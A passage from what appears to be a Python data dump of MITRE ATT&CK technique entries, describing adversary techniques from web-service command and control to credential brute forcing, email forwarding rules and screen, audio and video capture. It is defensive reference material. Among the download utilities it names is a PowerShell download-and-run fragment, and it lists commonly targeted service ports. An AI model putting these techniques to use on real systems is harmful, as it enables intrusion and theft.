                              'Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery '
                              'through malware binary analysis while also enabling operational resiliency (since this '
                              'infrastructure may be dynamically changed).',
               'name': 'Dead Drop Resolver',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1102.002': {'attack_id': 'T1102.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an existing, legitimate external Web service as a means for sending '
                              'commands to and receiving output from a compromised system over the Web service '
                              'channel. Compromised systems may leverage popular websites and social media to host '
                              'command and control (C2) instructions. Those infected systems can then send the output '
                              'from those commands back over that Web service channel. The return traffic may occur in '
                              'a variety of ways, depending on the Web service being utilized. For example, the return '
                              'traffic may take the form of the compromised system posting a comment on a forum, '
                              'issuing a pull request to development project, updating a document hosted on a Web '
                              'service, or by sending a Tweet. \n'
                              '\n'
                              'Popular websites and social media acting as a mechanism for C2 may give a significant '
                              'amount of cover due to the likelihood that hosts within a network are already '
                              'communicating with them prior to a compromise. Using common services, such as those '
                              'offered by Google or Twitter, makes it easier for adversaries to hide in expected '
                              'noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an '
                              'added level of protection. ',
               'name': 'Bidirectional Communication',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1102.003': {'attack_id': 'T1102.003',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an existing, legitimate external Web service as a means for sending '
                              'commands to a compromised system without receiving return output over the Web service '
                              'channel. Compromised systems may leverage popular websites and social media to host '
                              'command and control (C2) instructions. Those infected systems may opt to send the '
                              'output from those commands back over a different C2 channel, including to another '
                              'distinct Web service. Alternatively, compromised systems may return no output at all in '
                              'cases where adversaries want to send instructions to systems and do not want a '
                              'response.\n'
                              '\n'
                              'Popular websites and social media acting as a mechanism for C2 may give a significant '
                              'amount of cover due to the likelihood that hosts within a network are already '
                              'communicating with them prior to a compromise. Using common services, such as those '
                              'offered by Google or Twitter, makes it easier for adversaries to hide in expected '
                              'noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an '
                              'added level of protection.',
               'name': 'One-Way Communication',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1104': {'attack_id': 'T1104',
           'categories': ['command-and-control'],
           'description': 'Adversaries may create multiple stages for command and control that are employed under '
                          'different conditions or for certain functions. Use of multiple stages may obfuscate the '
                          'command and control channel to make detection more difficult.\n'
                          '\n'
                          'Remote access tools will call back to the first-stage command and control server for '
                          'instructions. The first stage may have automated capabilities to collect basic host '
                          'information, update tools, and upload additional files. A second remote access tool (RAT) '
                          'could be uploaded at that point to redirect the host to the second-stage command and '
                          'control server. The second stage will likely be more fully featured and allow the adversary '
                          'to interact with the system through a reverse shell and additional RAT features.\n'
                          '\n'
                          'The different stages will likely be hosted separately with no overlapping infrastructure. '
                          'The loader may also have backup first-stage callbacks or [Fallback '
                          'Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage '
                          'communication path is discovered and blocked.',
           'name': 'Multi-Stage Channels',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1105': {'attack_id': 'T1105',
           'categories': ['command-and-control'],
           'description': 'Adversaries may transfer tools or other files from an external system into a compromised '
                          'environment. Tools or files may be copied from an external adversary-controlled system to '
                          'the victim network through the command and control channel or through alternate protocols '
                          'such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also '
                          'transfer/spread tools between victim devices within a compromised environment (i.e. '
                          '[Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n'
                          '\n'
                          'On Windows, adversaries may use various utilities to download tools, such as `copy`, '
                          '`finger`, [certutil](https://attack.mitre.org/software/S0160), and '
                          '[PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as '
                          '<code>IEX(New-Object Net.WebClient).downloadString()</code> and '
                          '<code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also '
                          'exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: '
                          't1105_lolbas)\n'
                          '\n'
                          'Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to '
                          'download tools to victim hosts. Adversaries have also abused file application features, '
                          'such as the Windows `search-ms` protocol handler, to deliver malicious files to victims '
                          'through remote file searches invoked by [User '
                          'Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with '
                          '[Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: '
                          'Trellix_search-ms)\n'
                          '\n'
                          'Files can also be transferred using various [Web '
                          'Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present '
                          'tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, '
                          'adversaries may be able to leverage services that sync between a web-based and an '
                          'on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For '
                          "example, by compromising a cloud account and logging into the service's web portal, an "
                          'adversary may be able to trigger an automatic syncing process that transfers the file onto '
                          "the victim's machine.(Citation: Dropbox Malware Sync)",
           'name': 'Ingress Tool Transfer',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1106': {'attack_id': 'T1106',
           'categories': ['execution'],
           'description': 'Adversaries may interact with the native OS application programming interface (API) to '
                          'execute behaviors. Native APIs provide a controlled means of calling low-level OS services '
                          'within the kernel, such as those involving hardware/devices, memory, and '
                          'processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are '
                          'leveraged by the OS during system boot (when other system components are not yet '
                          'initialized) as well as carrying out tasks and requests during routine operations.\n'
                          '\n'
                          'Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to '
                          '[Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native '
                          'API and its hierarchy of interfaces provide mechanisms to interact with and utilize various '
                          'components of a victimized system.\n'
                          '\n'
                          'Native API functions (such as <code>NtCreateProcess</code>) may be directed invoked via '
                          'system calls / syscalls, but these features are also often exposed to user-mode '
                          'applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: '
                          'CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the '
                          'Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and '
                          'scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) '
                          'This may allow API callers to execute a binary, run a CLI command, load modules, etc. as '
                          'thousands of similar API functions exist for various system operations.(Citation: Microsoft '
                          'Win32)(Citation: LIBC)(Citation: GLIBC)\n'
                          '\n'
                          'Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also '
                          'available to interact with native APIs. These frameworks typically provide language '
                          'wrappers/abstractions to API functionalities and are designed for ease-of-use/portability '
                          'of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS '
                          'Cocoa)(Citation: macOS Foundation)\n'
                          '\n'
                          'Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to '
                          'subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: '
                          'Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools '
                          'associated with API monitoring, such as unhooking monitored functions via [Disable or '
                          'Modify Tools](https://attack.mitre.org/techniques/T1562/001).',
           'name': 'Native API',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1108': {'attack_id': 'T1108',
           'categories': ['defense-evasion', 'persistence'],
           'description': '**This technique has been deprecated. Please use [Create '
                          'Account](https://attack.mitre.org/techniques/T1136), [Web '
                          'Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote '
                          'Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n'
                          '\n'
                          'Adversaries may use more than one remote access tool with varying command and control '
                          'protocols or credentialed access to remote services so they can maintain access if an '
                          'access mechanism is detected or mitigated. \n'
                          '\n'
                          'If one type of tool is detected and blocked or removed as a response but the organization '
                          "did not gain a full understanding of the adversary's tools and access, then the adversary "
                          'will be able to retain access to the network. Adversaries may also attempt to gain access '
                          'to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote '
                          'Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to '
                          'maintain access despite interruptions to remote access tools deployed within a target '
                          'network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based '
                          'infrastructure and applications.\n'
                          '\n'
                          'Use of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain '
                          'access to a network through an externally accessible Web server.',
           'name': 'Redundant Access',
           'platforms': ['Windows', 'Azure AD', 'Office 365', 'SaaS', 'IaaS', 'Linux', 'macOS']},
 'T1110': {'attack_id': 'T1110',
           'categories': ['credential-access'],
           'description': 'Adversaries may use brute force techniques to gain access to accounts when passwords are '
                          'unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) '
                          'Without knowledge of the password for an account or set of accounts, an adversary may '
                          'systematically guess the password using a repetitive or iterative mechanism.(Citation: '
                          'Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a '
                          'service that will check the validity of those credentials or offline against previously '
                          'acquired credential data, such as password hashes.\n'
                          '\n'
                          'Brute forcing credentials may take place at various points during a breach. For example, '
                          'adversaries may attempt to brute force access to [Valid '
                          'Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging '
                          'knowledge gathered from other post-compromise behaviors such as [OS Credential '
                          'Dumping](https://attack.mitre.org/techniques/T1003), [Account '
                          'Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy '
                          'Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute '
                          'forcing activity with behaviors such as [External Remote '
                          'Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.',
           'name': 'Brute Force',
           'platforms': ['Windows',
                         'Azure AD',
                         'Office 365',
                         'SaaS',
                         'IaaS',
                         'Linux',
                         'macOS',
                         'Google Workspace',
                         'Containers',
                         'Network']},
 'T1110.001': {'attack_id': 'T1110.001',
               'categories': ['credential-access'],
               'description': 'Adversaries with no prior knowledge of legitimate credentials within the system or '
                              'environment may guess passwords to attempt access to accounts. Without knowledge of the '
                              'password for an account, an adversary may opt to systematically guess the password '
                              'using a repetitive or iterative mechanism. An adversary may guess login credentials '
                              'without prior knowledge of system or environment passwords during an operation by using '
                              'a list of common passwords. Password guessing may or may not take into account the '
                              "target's policies on password complexity or use policies that may lock accounts out "
                              'after a number of failed attempts.\n'
                              '\n'
                              'Guessing passwords can be a risky option because it could cause numerous authentication '
                              "failures and account lockouts, depending on the organization's login failure policies. "
                              '(Citation: Cylance Cleaver)\n'
                              '\n'
                              'Typically, management services over commonly used ports are used when guessing '
                              'passwords. Commonly targeted services include the following:\n'
                              '\n'
                              '* SSH (22/TCP)\n'
                              '* Telnet (23/TCP)\n'
                              '* FTP (21/TCP)\n'
                              '* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n'
                              '* LDAP (389/TCP)\n'
                              '* Kerberos (88/TCP)\n'
                              '* RDP / Terminal Services (3389/TCP)\n'
                              '* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n'
                              '* MSSQL (1433/TCP)\n'
                              '* Oracle (1521/TCP)\n'
                              '* MySQL (3306/TCP)\n'
                              '* VNC (5900/TCP)\n'
                              '* SNMP (161/UDP and 162/TCP/UDP)\n'
                              '\n'
                              'In addition to management services, adversaries may "target single sign-on (SSO) and '
                              'cloud-based applications utilizing federated authentication protocols," as well as '
                              'externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A '
                              '2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to '
                              'brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: '
                              'Trend Micro Emotet 2020)\n'
                              '\n'
                              'In default environments, LDAP and Kerberos connection attempts are less likely to '
                              'trigger events over SMB, which creates Windows "logon failure" event ID 4625.',
               'name': 'Password Guessing',
               'platforms': ['Windows',
                             'Azure AD',
                             'Office 365',
                             'SaaS',
                             'IaaS',
                             'Linux',
                             'macOS',
                             'Google Workspace',
                             'Containers',
                             'Network']},
 'T1110.002': {'attack_id': 'T1110.002',
               'categories': ['credential-access'],
               'description': 'Adversaries may use password cracking to attempt to recover usable credentials, such as '
                              'plaintext passwords, when credential material such as password hashes are obtained. [OS '
                              'Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain '
                              'password hashes, this may only get an adversary so far when [Pass the '
                              'Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further,  '
                              'adversaries may leverage [Data from Configuration '
                              'Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed '
                              'credentials for network devices.(Citation: US-CERT-TA18-106A) \n'
                              '\n'
                              'Techniques to systematically guess the passwords used to compute hashes are available, '
                              'or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes '
                              'is usually done on adversary-controlled systems outside of the target '
                              'network.(Citation: Wikipedia Password cracking) The resulting plaintext password '
                              'resulting from a successfully cracked hash may be used to log into systems, resources, '
                              'and services in which the account has access.',
               'name': 'Password Cracking',
               'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'Azure AD', 'Network']},
 'T1110.003': {'attack_id': 'T1110.003',
               'categories': ['credential-access'],
               'description': 'Adversaries may use a single or small list of commonly used passwords against many '
                              'different accounts to attempt to acquire valid account credentials. Password spraying '
                              "uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that "
                              'may match the complexity policy of the domain. Logins are attempted with that password '
                              'against many different accounts on a network to avoid account lockouts that would '
                              'normally occur when brute forcing a single account with many passwords. (Citation: '
                              'BlackHillsInfosec Password Spraying)\n'
                              '\n'
                              'Typically, management services over commonly used ports are used when password '
                              'spraying. Commonly targeted services include the following:\n'
                              '\n'
                              '* SSH (22/TCP)\n'
                              '* Telnet (23/TCP)\n'
                              '* FTP (21/TCP)\n'
                              '* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n'
                              '* LDAP (389/TCP)\n'
                              '* Kerberos (88/TCP)\n'
                              '* RDP / Terminal Services (3389/TCP)\n'
                              '* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n'
                              '* MSSQL (1433/TCP)\n'
                              '* Oracle (1521/TCP)\n'
                              '* MySQL (3306/TCP)\n'
                              '* VNC (5900/TCP)\n'
                              '\n'
                              'In addition to management services, adversaries may "target single sign-on (SSO) and '
                              'cloud-based applications utilizing federated authentication protocols," as well as '
                              'externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A '
                              '2018)\n'
                              '\n'
                              'In default environments, LDAP and Kerberos connection attempts are less likely to '
                              'trigger events over SMB, which creates Windows "logon failure" event ID 4625.',
               'name': 'Password Spraying',
               'platforms': ['Windows',
                             'Azure AD',
                             'Office 365',
                             'SaaS',
                             'IaaS',
                             'Linux',
                             'macOS',
                             'Google Workspace',
                             'Containers',
                             'Network']},
 'T1110.004': {'attack_id': 'T1110.004',
               'categories': ['credential-access'],
               'description': 'Adversaries may use credentials obtained from breach dumps of unrelated accounts to '
                              'gain access to target accounts through credential overlap. Occasionally, large numbers '
                              'of username and password pairs are dumped online when a website or service is '
                              'compromised and the user account credentials accessed. The information may be useful to '
                              'an adversary attempting to compromise accounts by taking advantage of the tendency for '
                              'users to use the same passwords across personal and business accounts.\n'
                              '\n'
                              'Credential stuffing is a risky option because it could cause numerous authentication '
                              "failures and account lockouts, depending on the organization's login failure policies.\n"
                              '\n'
                              'Typically, management services over commonly used ports are used when stuffing '
                              'credentials. Commonly targeted services include the following:\n'
                              '\n'
                              '* SSH (22/TCP)\n'
                              '* Telnet (23/TCP)\n'
                              '* FTP (21/TCP)\n'
                              '* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n'
                              '* LDAP (389/TCP)\n'
                              '* Kerberos (88/TCP)\n'
                              '* RDP / Terminal Services (3389/TCP)\n'
                              '* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n'
                              '* MSSQL (1433/TCP)\n'
                              '* Oracle (1521/TCP)\n'
                              '* MySQL (3306/TCP)\n'
                              '* VNC (5900/TCP)\n'
                              '\n'
                              'In addition to management services, adversaries may "target single sign-on (SSO) and '
                              'cloud-based applications utilizing federated authentication protocols," as well as '
                              'externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A '
                              '2018)',
               'name': 'Credential Stuffing',
               'platforms': ['Windows',
                             'Azure AD',
                             'Office 365',
                             'SaaS',
                             'IaaS',
                             'Linux',
                             'macOS',
                             'Google Workspace',
                             'Containers',
                             'Network']},
 'T1111': {'attack_id': 'T1111',
           'categories': ['credential-access'],
           'description': 'Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, '
                          'token generators, etc.) to gain access to credentials that can be used to access systems, '
                          'services, and network resources. Use of MFA is recommended and provides a higher level of '
                          'security than usernames and passwords alone, but organizations should be aware of '
                          'techniques that could be used to intercept and bypass these security mechanisms. \n'
                          '\n'
                          'If a smart card is used for multi-factor authentication, then a keylogger will need to be '
                          'used to obtain the password associated with a smart card during normal use. With both an '
                          'inserted card and access to the smart card password, an adversary can connect to a network '
                          'resource using the infected system to proxy the authentication with the inserted hardware '
                          'token. (Citation: Mandiant M Trends 2011)\n'
                          '\n'
                          'Adversaries may also employ a keylogger to similarly target other hardware tokens, such as '
                          "RSA SecurID. Capturing token input (including a user's personal identification code) may "
                          'provide temporary access (i.e. replay the one-time passcode until the next value rollover) '
                          'as well as possibly enabling adversaries to reliably predict future authentication values '
                          '(given access to both the algorithm and any seed values used to generate appended temporary '
                          'codes). (Citation: GCN RSA June 2011)\n'
                          '\n'
                          'Other methods of MFA may be intercepted and used by an adversary to authenticate. It is '
                          'common for one-time codes to be sent via out-of-band communications (email, SMS). If the '
                          'device and/or service is not secured, then it may be vulnerable to interception. Service '
                          'providers can also be targeted: for example, an adversary may compromise an SMS messaging '
                          'service in order to steal MFA codes sent to users’ phones.(Citation: Okta Scatter Swine '
                          '2022)',
           'name': 'Multi-Factor Authentication Interception',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1112': {'attack_id': 'T1112',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may interact with the Windows Registry to hide configuration information within '
                          'Registry keys, remove information as part of cleaning up, or as part of other techniques to '
                          'aid in persistence and execution.\n'
                          '\n'
                          'Access to specific areas of the Registry depends on account permissions, some requiring '
                          'administrator-level access. The built-in Windows command-line utility '
                          '[Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry '
                          'modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote '
                          'access tool, which may contain functionality to interact with the Registry through the '
                          'Windows API.\n'
                          '\n'
                          'Registry modifications may also include actions to hide keys, such as prepending key names '
                          'with a null character, which will cause an error and/or be ignored when read via '
                          '[Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. '
                          '(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to '
                          'conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG '
                          '2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n'
                          '\n'
                          'The Registry of a remote system may be modified to aid in execution of files as part of '
                          'lateral movement. It requires the remote Registry service to be running on the target '
                          'system. (Citation: Microsoft Remote) Often [Valid '
                          'Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the '
                          "remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) "
                          'for RPC communication.',
           'name': 'Modify Registry',
           'platforms': ['Windows']},
 'T1113': {'attack_id': 'T1113',
           'categories': ['collection'],
           'description': 'Adversaries may attempt to take screen captures of the desktop to gather information over '
                          'the course of an operation. Screen capturing functionality may be included as a feature of '
                          'a remote access tool used in post-compromise operations. Taking a screenshot is also '
                          'typically possible through native utilities or API calls, such as '
                          '<code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: '
                          'CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n',
           'name': 'Screen Capture',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1114': {'attack_id': 'T1114',
           'categories': ['collection'],
           'description': 'Adversaries may target user email to collect sensitive information. Emails may contain '
                          'sensitive data, including trade secrets or personal information, that can prove valuable to '
                          'adversaries. Adversaries can collect or forward email from mail servers or clients. ',
           'name': 'Email Collection',
           'platforms': ['Windows', 'Office 365', 'Google Workspace', 'macOS', 'Linux']},
 'T1114.001': {'attack_id': 'T1114.001',
               'categories': ['collection'],
               'description': 'Adversaries may target user email on local systems to collect sensitive information. '
                              'Files containing email data can be acquired from a user’s local system, such as Outlook '
                              'storage or cache files.\n'
                              '\n'
                              'Outlook stores data locally in offline data files with an extension of .ost. Outlook '
                              '2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook '
                              'support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and '
                              'earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas '
                              'IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data '
                              'files are typically stored in `C:\\Users\\<username>\\Documents\\Outlook Files` or '
                              '`C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft '
                              'Outlook Files)',
               'name': 'Local Email Collection',
               'platforms': ['Windows']},
 'T1114.002': {'attack_id': 'T1114.002',
               'categories': ['collection'],
               'description': 'Adversaries may target an Exchange server, Office 365, or Google Workspace to collect '
                              "sensitive information. Adversaries may leverage a user's credentials and interact "
                              'directly with the Exchange server to acquire information from within a network. '
                              'Adversaries may also access externally facing Exchange services, Office 365, or Google '
                              'Workspace to access email using credentials or access tokens. Tools such as '
                              '[MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches '
                              'for specific keywords.',
               'name': 'Remote Email Collection',
               'platforms': ['Office 365', 'Windows', 'Google Workspace']},
 'T1114.003': {'attack_id': 'T1114.003',
               'categories': ['collection'],
               'description': 'Adversaries may setup email forwarding rules to collect sensitive information. '
                              'Adversaries may abuse email forwarding rules to monitor the activities of a victim, '
                              'steal information, and further gain intelligence on the victim or the victim’s '
                              'organization to use as part of further exploits or operations.(Citation: US-CERT '
                              'TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain '
                              "persistent access to victim's emails even after compromised credentials are reset by "
                              'administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow '
                              'users to create inbox rules for various email functions, including forwarding to a '
                              'different recipient. These rules may be created through a local email application, a '
                              'web interface, or by command-line interface. Messages can be forwarded to internal or '
                              'external recipients, and there are no restrictions limiting the extent of this rule. '
                              'Administrators may also create forwarding rules for user accounts with the same '
                              'considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding '
                              '2)(Citation: Mac Forwarding Rules)\n'
                              '\n'
                              'Any user or administrator within the organization (or adversary with valid credentials) '
                              'can create rules to automatically forward all received messages to another recipient, '
                              'forward emails to different locations based on the sender, and more. Adversaries may '
                              'also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the '
                              'rule properties, making it hidden and not visible from Outlook, OWA or most Exchange '
                              'Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)\n'
                              '\n'
                              'In some environments, administrators may be able to enable email forwarding rules that '
                              'operate organization-wide rather than on individual inboxes. For example, Microsoft '
                              'Exchange supports transport rules that evaluate all mail an organization receives '
                              'against user-specified conditions, then performs a user-specified action on mail that '
                              'adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that '
                              'abuse such features may be able to enable forwarding on all or specific mail an '
                              'organization receives. ',
               'name': 'Email Forwarding Rule',
               'platforms': ['Office 365', 'Windows', 'Google Workspace', 'macOS', 'Linux']},
 'T1115': {'attack_id': 'T1115',
           'categories': ['collection'],
           'description': 'Adversaries may collect data stored in the clipboard from users copying information within '
                          'or between applications. \n'
                          '\n'
                          'For example, on Windows adversaries can access clipboard data by using '
                          '<code>clip.exe</code> or <code>Get-Clipboard</code>.(Citation: MSDN Clipboard)(Citation: '
                          'clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then '
                          'replace users’ clipboard with their data (e.g., [Transmitted Data '
                          'Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: '
                          'mining_ruby_reversinglabs)\n'
                          '\n'
                          'macOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard '
                          'contents.(Citation: Operating with EmPyre)',
           'name': 'Clipboard Data',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1119': {'attack_id': 'T1119',
           'categories': ['collection'],
           'description': 'Once established within a system or network, an adversary may use automated techniques for '
                          'collecting internal data. Methods for performing this technique could include use of a '
                          '[Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search '
                          'for and copy information fitting set criteria such as file type, location, or name at '
                          'specific time intervals. \n'
                          '\n'
                          'In cloud-based environments, adversaries may also use cloud APIs, data pipelines, command '
                          'line interfaces, or extract, transform, and load (ETL) services to automatically collect '
                          'data.(Citation: Mandiant UNC3944 SMS Phishing 2023) \n'
                          '\n'
                          'This functionality could also be built into remote access tools. \n'
                          '\n'
                          'This technique may incorporate use of other techniques such as [File and Directory '
                          'Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool '
                          'Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as '
                          '[Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage '
                          'Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud '
                          'environments.',
           'name': 'Automated Collection',
           'platforms': ['Linux', 'macOS', 'Windows', 'IaaS', 'SaaS']},
 'T1120': {'attack_id': 'T1120',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to gather information about attached peripheral devices and '
                          'components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: '
                          'Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that '
                          'support a variety of functionalities such as keyboards, printers, cameras, smart card '
                          'readers, or removable storage. The information may be used to enhance their awareness of '
                          'the system and network environment or may be used for further actions.',
           'name': 'Peripheral Device Discovery',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1123': {'attack_id': 'T1123',
           'categories': ['collection'],
           'description': "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) "
                          'or applications (e.g., voice and video call services) to capture audio recordings for the '
                          'purpose of listening into sensitive conversations to gather information.(Citation: ESET '
                          'Attor Oct 2019)\n'
                          '\n'
                          'Malware or scripts may be used to interact with the devices through an available API '
                          'provided by the operating system or an application to capture audio. Audio files may be '
                          'written to disk and exfiltrated later.',
           'name': 'Audio Capture',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1124': {'attack_id': 'T1124',
           'categories': ['discovery'],
           'description': 'An adversary may gather the system time and/or time zone settings from a local or remote '
                          'system. The system time is set and stored by services, such as the Windows Time Service on '
                          'Windows or <code>systemsetup</code> on macOS.(Citation: MSDN System Time)(Citation: Technet '
                          'Windows Time Service)(Citation: systemsetup mac time) These time settings may also be '
                          'synchronized between systems and services in an enterprise network, typically accomplished '
                          'with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system '
                          'time)\n'
                          '\n'
                          'System time information may be gathered in a number of ways, such as with '
                          '[Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time '
                          "\\\\hostname</code> to gather the system time on a remote system. The victim's time zone "
                          'may also be inferred from the current system time or gathered by using <code>w32tm '
                          '/tz</code>.(Citation: Technet Windows Time Service) In addition, adversaries can discover '
                          'device uptime through functions such as <code>GetTickCount()</code> to determine how long '
                          'it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)\n'
                          '\n'
                          'On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) '
                          'commands such as `show clock detail` can be used to see the current time '
                          'configuration.(Citation: show_clock_detail_cisco_cmd)\n'
                          '\n'
                          'In addition, system calls – such as <code>time()</code> – have been used to collect the '
                          'current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may '
                          'use commands such as <code>systemsetup -gettimezone</code> or '
                          '<code>timeIntervalSinceNow</code> to gather current time zone information or current date '
                          'and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan '
                          '2022)\n'
                          '\n'
                          'This information could be useful for performing other techniques, such as executing a file '
                          'with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 '
                          "They're Inside), or to discover locality information based on time zone to assist in victim "
                          'targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). '
                          'Adversaries may also use knowledge of system time as part of a time bomb, or delaying '
                          'execution until a specified date/time.(Citation: AnyRun TimeBomb)',
           'name': 'System Time Discovery',
           'platforms': ['Windows', 'Network', 'Linux', 'macOS']},
 'T1125': {'attack_id': 'T1125',
           'categories': ['collection'],
           'description': "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or "
                          'webcams) or applications (e.g., video call services) to capture video recordings for the '
                          'purpose of gathering information. Images may also be captured from devices or applications, '
                          'potentially in specified intervals, in lieu of video files.\n'
                          '\n'
                          'Malware or scripts may be used to interact with the devices through an available API '
                          'provided by the operating system or an application to capture video or images. Video or '
                          'image files may be written to disk and exfiltrated later. This technique differs from '
                          '[Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices '
                          "or applications for video recording rather than capturing the victim's screen.\n"
                          '\n'
                          "In macOS, there are a few different malware samples that record the user's webcam such as "
                          'FruitFly and Proton. (Citation: objective-see 2017 review)',
           'name': 'Video Capture',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1127': {'attack_id': 'T1127',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may take advantage of trusted developer utilities to proxy execution of '
                          'malicious payloads. There are many utilities used for software development related tasks '
                          'that can be used to execute code in various forms to assist in development, debugging, and '
                          'reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI '
                          'Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may '
                          'often be signed with legitimate certificates that allow them to execute on a system and '
                          'proxy execution of malicious code through a trusted process that effectively bypasses '
                          'application control solutions.',
